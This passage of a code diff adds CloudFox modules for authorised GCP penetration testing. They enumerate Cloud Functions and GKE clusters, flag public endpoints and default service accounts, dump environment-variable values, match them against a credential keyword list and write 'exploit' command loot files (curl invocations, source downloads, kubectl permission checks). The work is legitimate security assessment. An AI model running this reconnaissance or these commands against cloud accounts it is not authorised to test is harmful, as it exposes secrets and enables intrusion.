nil if not found +func FindAndLoadFoxMapper(orgID string, projectIDs []string, logger internal.Logger) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first + if orgID != "" { + if err := cache.LoadFromOrg(orgID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for org: %s", orgID), "foxmapper") + return cache + } + } + + // Try each project + for _, projectID := range projectIDs { + if err := cache.LoadFromProject(projectID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for project: %s", projectID), "foxmapper") + return cache + } + } + + return nil +} + +// SortNodesByPrivesc sorts nodes by privesc capability for display +func SortNodesByPrivesc(nodes []*foxmapperservice.Node) { + sort.Slice(nodes, func(i, j int) bool { + // Admins first + if nodes[i].IsAdmin && !nodes[j].IsAdmin { + return true + } + if !nodes[i].IsAdmin && nodes[j].IsAdmin { + return false + } + // Then by admin level (org > folder > project) + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2, "": 3} + if nodes[i].AdminLevel != nodes[j].AdminLevel { + return levelOrder[nodes[i].AdminLevel] < levelOrder[nodes[j].AdminLevel] + } + // Then by email + return nodes[i].Email < nodes[j].Email + }) +} diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go new file mode 100755 index 00000000..dd317818 --- /dev/null +++ b/gcp/commands/functions.go @@ -0,0 +1,622 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFunctionsCommand = &cobra.Command{ + Use: globals.GCP_FUNCTIONS_MODULE_NAME, + Aliases: []string{"function", "gcf", "cloud-functions"}, + Short: "Enumerate GCP Cloud Functions with security analysis", + Long: `Enumerate GCP Cloud Functions across projects with security-relevant details. + +Features: +- Lists all Cloud Functions (Gen 2) accessible to the authenticated user +- Shows security configuration (ingress settings, VPC connector, service account) +- Identifies publicly invokable functions (allUsers/allAuthenticatedUsers) +- Shows runtime, trigger type, and trigger configuration +- Counts environment variables and secret references +- Generates gcloud commands for further enumeration and exploitation + +Security Columns: +- Ingress: ALL_TRAFFIC (public), INTERNAL_ONLY, or INTERNAL_AND_GCLB +- Public: Whether allUsers or allAuthenticatedUsers can invoke the function +- ServiceAccount: The identity the function runs as (privilege level) +- VPCConnector: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this function (e.g., roles/cloudfunctions.invoker) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this function + +Attack Surface: +- Public HTTP functions may be directly exploitable +- Functions with default service account may have excessive permissions +- Functions with VPC connectors can access internal resources +- Event triggers reveal integration points (Pub/Sub, Storage, etc.) + +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPFunctionsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FunctionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectFunctions map[string][]FunctionsService.FunctionInfo // projectID -> functions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FunctionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FunctionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FunctionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FUNCTIONS_MODULE_NAME) + if err != nil { + return + } + + module := &FunctionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFunctions: make(map[string][]FunctionsService.FunctionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) + + // Get all functions for stats + allFunctions := m.getAllFunctions() + if len(allFunctions) == 0 { + logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) + return + } + + // Count public functions + publicCount := 0 + for _, fn := range allFunctions { + if fn.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(allFunctions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(allFunctions)), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllFunctions returns all functions from all projects (for statistics) +func (m *FunctionsModule) getAllFunctions() []FunctionsService.FunctionInfo { + var all []FunctionsService.FunctionInfo + for _, functions := range m.ProjectFunctions { + all = append(all, functions...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FunctionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Functions in project: %s", projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + fs := FunctionsService.New() + functions, err := fs.Functions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FUNCTIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate functions in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectFunctions[projectID] = functions + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } + } + + for _, fn := range functions { + m.addFunctionToLoot(projectID, fn) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d function(s) in project %s", len(functions), projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsService.FunctionInfo) { + commandsLoot := m.LootMap[projectID]["functions-commands"] + secretsLoot := m.LootMap[projectID]["functions-secrets"] + + if commandsLoot == nil { + return + } + + // All commands for this function + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FUNCTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Runtime: %s, Trigger: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v, Ingress: %s\n", + fn.Name, + fn.ProjectID, fn.Region, + fn.Runtime, fn.TriggerType, + fn.ServiceAccount, + fn.IsPublic, fn.IngressSettings, + ) + + if fn.TriggerURL != "" { + commandsLoot.Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + } + + if fn.SourceLocation != "" { + commandsLoot.Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + } + + commandsLoot.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe function:\n"+ + "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "# Get IAM policy:\n"+ + "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ + "# Read logs:\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n", + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + ) + + // HTTP invocation commands + commandsLoot.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + commandsLoot.Contents += fmt.Sprintf( + "# Invoke (GET):\n"+ + "curl -s '%s'\n"+ + "# Invoke (POST with auth):\n"+ + "curl -s -X POST '%s' \\\n"+ + " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ + " -H 'Content-Type: application/json' \\\n"+ + " -d '{\"test\": \"data\"}'\n", + fn.TriggerURL, + fn.TriggerURL, + ) + } + + // Source download command + if fn.SourceType == "GCS" && fn.SourceLocation != "" { + commandsLoot.Contents += fmt.Sprintf( + "# Download source:\n"+ + "gsutil cp %s ./function-source-%s.zip\n", + fn.SourceLocation, fn.Name, + ) + } + + commandsLoot.Contents += "\n" + + // Secret references + if (len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0) && secretsLoot != nil { + secretsLoot.Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + if len(fn.SecretEnvVarNames) > 0 { + secretsLoot.Contents += "## Secret Environment Variables:\n" + for _, secretName := range fn.SecretEnvVarNames { + secretsLoot.Contents += fmt.Sprintf("## - %s\n", secretName) + } + } + if len(fn.SecretVolumeNames) > 0 { + secretsLoot.Contents += "## Secret Volumes:\n" + for _, volName := range fn.SecretVolumeNames { + secretsLoot.Contents += fmt.Sprintf("## - %s\n", volName) + } + } + secretsLoot.Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, functions := range m.ProjectFunctions { + tables := m.buildTablesForProject(projectID, functions) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FunctionsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFunctions := m.getAllFunctions() + tables := m.buildTablesForProject("", allFunctions) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FunctionsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isEmptyLootFile checks if a loot file contains only the header +func isEmptyLootFile(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") || + strings.HasSuffix(contents, "# Generated by CloudFox\n\n") +} + +// buildTablesForProject builds all tables for a given project's functions +func (m *FunctionsModule) buildTablesForProject(projectID string, functions []FunctionsService.FunctionInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Main functions table + body := m.functionsToTableBody(functions) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }) + } + + // Secrets table (env vars and secret refs - matching Cloud Run format) + secretsHeader := []string{ + "Project", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", + } + + var secretsBody [][]string + for _, fn := range functions { + // Add environment variables from EnvVars (has actual values) + for _, env := range fn.EnvVars { + sensitive := isFunctionSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + env.Value, + "EnvVar", + sensitive, + }) + } else { + // Secret Manager reference + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), + "SecretManager", + "Yes", + }) + } + } + + // Add secret volumes + for _, volName := range fn.SecretVolumeNames { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + volName + " (volume)", + volName, + "SecretManager", + "Yes", + }) + } + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + return tableFiles +} + +// isFunctionSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isFunctionSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + sensitivePatterns := []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", "AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", "MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", + } + for _, pattern := range sensitivePatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } + } + return "No" +} + +// getTableHeader returns the functions table header +func (m *FunctionsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "Runtime", + "State", + "Trigger", + "URL", + "Ingress", + "Public", + "Service Account", + "SA Attack Paths", + "Default SA", + "VPC Access", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// functionsToTableBody converts functions to table body rows +func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.FunctionInfo) [][]string { + var body [][]string + for _, fn := range functions { + // Format trigger info + triggerInfo := fn.TriggerType + if fn.TriggerEventType != "" { + triggerInfo = fmt.Sprintf("%s (%s)", fn.TriggerType, extractFunctionName(fn.TriggerEventType)) + } + + // Format URL + url := "-" + if fn.TriggerURL != "" { + url = fn.TriggerURL + } + + // Format state + state := fn.State + if state == "" { + state = "-" + } + + // Format VPC access (renamed from VPC Connector for consistency with Cloud Run) + vpcAccess := "-" + if fn.VPCConnector != "" { + vpcAccess = extractFunctionName(fn.VPCConnector) + if fn.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(fn.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Format service account + serviceAccount := fn.ServiceAccount + if serviceAccount == "" { + serviceAccount = "-" + } + + // Check if using default service account + defaultSA := "No" + if strings.Contains(serviceAccount, "@appspot.gserviceaccount.com") || + strings.Contains(serviceAccount, "-compute@developer.gserviceaccount.com") { + defaultSA = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if serviceAccount != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, serviceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // Format ingress for display (consistent with Cloud Run) + ingress := formatFunctionIngress(fn.IngressSettings) + + // If function has IAM bindings, create one row per binding (shows IAM Binding Role/Principal) + if len(fn.IAMBindings) > 0 { + for _, binding := range fn.IAMBindings { + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + fn.Runtime, + state, + triggerInfo, + url, + ingress, + shared.BoolToYesNo(fn.IsPublic), + serviceAccount, + attackPaths, + defaultSA, + vpcAccess, + binding.Role, + binding.Member, + }) + } + } else { + // Function has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + fn.Runtime, + state, + triggerInfo, + url, + ingress, + shared.BoolToYesNo(fn.IsPublic), + serviceAccount, + attackPaths, + defaultSA, + vpcAccess, + "-", + "-", + }) + } + } + return body +} + +// formatFunctionIngress formats ingress settings for display (consistent with Cloud Run) +func formatFunctionIngress(ingress string) string { + switch ingress { + case "ALLOW_ALL": + return "ALL (Public)" + case "ALLOW_INTERNAL_ONLY": + return "INTERNAL" + case "ALLOW_INTERNAL_AND_GCLB": + return "INT+LB" + default: + return ingress + } +} + +// extractFunctionName extracts just the name from a resource path +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go new file mode 100755 index 00000000..5c0aea3a --- /dev/null +++ b/gcp/commands/gke.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPGKECommand = &cobra.Command{ + Use: globals.GCP_GKE_MODULE_NAME, + Aliases: []string{"kubernetes", "k8s", "clusters"}, + Short: "Enumerate GKE clusters with security analysis", + Long: `Enumerate GKE clusters across projects with comprehensive security analysis. + +Features: +- Lists all GKE clusters accessible to the authenticated user +- Analyzes security configuration (private clusters, authorized networks, RBAC) +- Identifies clusters with public API endpoints +- Shows workload identity configuration +- Detects common misconfigurations (legacy ABAC, basic auth, no network policy) +- Enumerates node pools with service accounts and OAuth scopes +- Shows Binary Authorization status +- Shows GKE Autopilot vs Standard mode +- Shows Config Connector and Istio/ASM status +- Shows maintenance window and exclusions +- Generates kubectl and gcloud commands for further analysis + +Security Columns: +- Private: Whether the cluster uses private nodes (no public IPs) +- MasterAuth: Master authorized networks enabled +- NetworkPolicy: Kubernetes network policy controller enabled +- WorkloadIdentity: GKE Workload Identity configured +- ShieldedNodes: Shielded GKE nodes enabled +- BinAuth: Binary Authorization enabled +- Autopilot: GKE Autopilot mode (vs Standard) +- Issues: Detected security misconfigurations + +Attack Surface: +- Public API servers are accessible from the internet +- Clusters without Workload Identity use node service accounts +- Default service accounts may have excessive permissions +- Legacy ABAC allows broader access than RBAC +- Autopilot clusters have reduced attack surface +- Binary Authorization prevents untrusted container images + +TIP: Run 'workload-identity' to enumerate K8s SA -> GCP SA bindings and Workload Identity Federation (external identity pools/providers).`, + Run: runGCPGKECommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type GKEModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters + ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type GKEOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o GKEOutput) TableFiles() []internal.TableFile { return o.Table } +func (o GKEOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPGKECommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_GKE_MODULE_NAME) + if err != nil { + return + } + + module := &GKEModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]GKEService.ClusterInfo), + ProjectNodePools: make(map[string][]GKEService.NodePoolInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_GKE_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) + + // Get all clusters for stats + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + if len(allClusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) + return + } + + // Count public clusters + publicCount := 0 + for _, cluster := range allClusters { + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + publicCount++ + } + } + + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(allClusters), len(allNodePools)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) + } + logger.SuccessM(msg, globals.GCP_GKE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllClusters returns all clusters from all projects (for statistics) +func (m *GKEModule) getAllClusters() []GKEService.ClusterInfo { + var all []GKEService.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllNodePools returns all node pools from all projects (for statistics) +func (m *GKEModule) getAllNodePools() []GKEService.NodePoolInfo { + var all []GKEService.NodePoolInfo + for _, nodePools := range m.ProjectNodePools { + all = append(all, nodePools...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *GKEModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE clusters in project: %s", projectID), globals.GCP_GKE_MODULE_NAME) + } + + gs := GKEService.New() + clusters, nodePools, err := gs.Clusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_GKE_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectClusters[projectID] = clusters + m.ProjectNodePools[projectID] = nodePools + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cluster := range clusters { + m.addClusterToLoot(projectID, cluster) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d cluster(s) in project %s", len(clusters), projectID), globals.GCP_GKE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.ClusterInfo) { + lootFile := m.LootMap[projectID]["gke-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Get detailed cluster configuration and settings\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n\n"+ + "# Configure kubectl to authenticate to this cluster\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n\n"+ + "# List all node pools in this cluster\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ + "# kubectl commands (after getting credentials):\n\n"+ + "# Show cluster endpoint and services info\n"+ + "kubectl cluster-info\n\n"+ + "# List all nodes with additional details (IP, OS, runtime)\n"+ + "kubectl get nodes -o wide\n\n"+ + "# List all namespaces in the cluster\n"+ + "kubectl get namespaces\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Check what actions you can perform in the cluster\n"+ + "kubectl auth can-i --list\n\n", + cluster.Name, + cluster.ProjectID, cluster.Location, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *GKEModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectClusters { + projectsWithData[projectID] = true + } + + // Build project-level outputs + for projectID := range projectsWithData { + clusters := m.ProjectClusters[projectID] + nodePools := m.ProjectNodePools[projectID] + + tables := m.buildTablesForProject(clusters, nodePools) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = GKEOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *GKEModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allNodePools := m.getAllNodePools() + + tables := m.buildTablesForProject(allClusters, allNodePools) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := GKEOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds all tables for given clusters and node pools +func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nodePools []GKEService.NodePoolInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Clusters table - columns grouped by: identity, network/access, cluster-level security + clusterHeader := []string{ + "Project", "Name", "Location", "Mode", "Status", "Version", "Release Channel", + "Endpoint", "Private", "Authorized CIDRs", + "WorkloadID", "NetPolicy", "BinAuth", + } + + var clusterBody [][]string + for _, cluster := range clusters { + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "-" + } + endpoint := cluster.Endpoint + if endpoint == "" { + endpoint = "-" + } + + // Format authorized CIDRs + authorizedCIDRs := 